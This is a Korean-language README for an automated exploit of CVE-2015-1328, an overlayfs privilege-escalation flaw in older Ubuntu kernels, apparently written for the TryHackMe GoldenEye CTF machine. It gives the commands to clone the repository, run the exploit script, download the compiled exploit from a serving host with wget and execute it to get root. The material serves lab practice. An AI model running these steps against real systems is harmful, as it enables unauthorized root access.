
커널 익스플로잇
Ubuntu 15.04까지의 linux(일명 Linux 커널) 패키지에서 3.19.0-21.21 이전의 overlayfs 구현은 상위 파일시스템 디렉터리에서 파일 생성에 대한 권한을 제대로 확인하지 않습니다. 따라서 로컬 사용자는 overlayfs가 임의의 마운트 네임스페이스에서 허용되는 구성을 악용하여 루트 액세스 권한을 얻을 수 있습니다.
rebel님께 감사드립니다.
이것은 TryHackMe의 GoldenEye CTF를 위한 CVE-2015-1328 자동화 익스플로잇입니다. 기본적으로 해당 머신에는 gcc가 없어서 gcc를 cc로 구성한 뒤 익스플로잇을 실행하여 루트 권한을 얻었습니다.
설치
이 저장소를 클론하기만 하면 됩니다 -
$ git clone https://github.com/elit3pwner/CVE-2015-1328-GoldenEye.git
$ cd CVE-2015-1328-GoldenEye
$ chmod +x exploit.sh
$ bash exploit.sh
$ wget http://<target ip>:6969/exploit
$ chmod +x exploit
$ ./exploit